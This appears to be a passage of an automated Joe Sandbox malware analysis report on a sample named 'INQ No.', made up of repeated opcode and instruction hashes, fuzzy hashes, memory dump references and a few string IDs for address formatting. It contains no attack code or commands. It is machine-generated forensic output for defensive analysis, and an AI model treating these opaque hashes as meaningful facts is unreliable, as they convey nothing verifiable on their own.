                                                                                                                                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE02633210A04D7C728DE18C411B7273A4EF44730F08423EA553477C0C934E804E794
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction ID: ed7858c4f85353f513b716b45796d68a1feffca3fc81cc65adbce402da07c876
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction Fuzzy Hash: C7D05E36511A50AFC3329F1BEA04D13FBF9FBC4B20705066EA44693920C670EC06DBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction ID: 9f0a5758f6c27e2f71dba7b6970c0cd3691fbb37b24149c3723fc9e1614cdf40
                                                                                                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction Fuzzy Hash: FCD0A932608A60ABD732AA2CFC04FC373E8AB88720F160499B009D7050C3A0EC81CA84
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction ID: 0585d7d30bdfae6ca3a7859a49707b5a7f4aab0f68db0f097045d4d91069591f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EE0EC359506849BCF16EF59C644F5ABBF5FB84B50F191458A4086B661C624ED01DB40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction ID: b83c5004014320f1f369dc503bea10085c1da4695270a6cea8e4ce97faac03bb
                                                                                                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction Fuzzy Hash: B0D0123221707497CB2956656E14FA7B9559B81BA8F2E107D740BB3900C5168C43D6E1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction ID: 097d3cf96d2fc5ee32ad5a1896ff75392af0202f64f4a814a18bc8a8bcdeddde
                                                                                                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction Fuzzy Hash: E7D022370D014CBBCB119F62CC02F907BA8E750BA0F004020B504870A0C63AE950C580
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d248cb9a15156ff8aad6625e8dc5a86fddb768aab6d93a45acc6bf0bab127411
                                                                                                                                                                            • Instruction ID: 7c3aab982f57f0946f25ffab9ac21f1858f459262a0320d93e12eff1d19cd670
                                                                                                                                                                            • Opcode Fuzzy Hash: d248cb9a15156ff8aad6625e8dc5a86fddb768aab6d93a45acc6bf0bab127411
                                                                                                                                                                            • Instruction Fuzzy Hash: 53D0A930E0500ACBCF1ACF14CB29E3E7AB0EF10780B4000A8FE01A2070E328DC02FAA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction ID: dca603a1cb481fa75bd42954f8d35e99f851c9ee8a7fd656783d9137928e8965
                                                                                                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction Fuzzy Hash: 89D0C935212EC0CFC61BCB0DC5A8B1533F8BB48B88F855490E541CBB22E66CED80CE00
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction ID: b43a8386d88942015529d4d78911fc5d53539deced27e2415980463daa2fc03f
                                                                                                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction Fuzzy Hash: 15C08033150648AFC711DF95CD01F0177E9E798B40F100061F30557571C531FD10D654
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%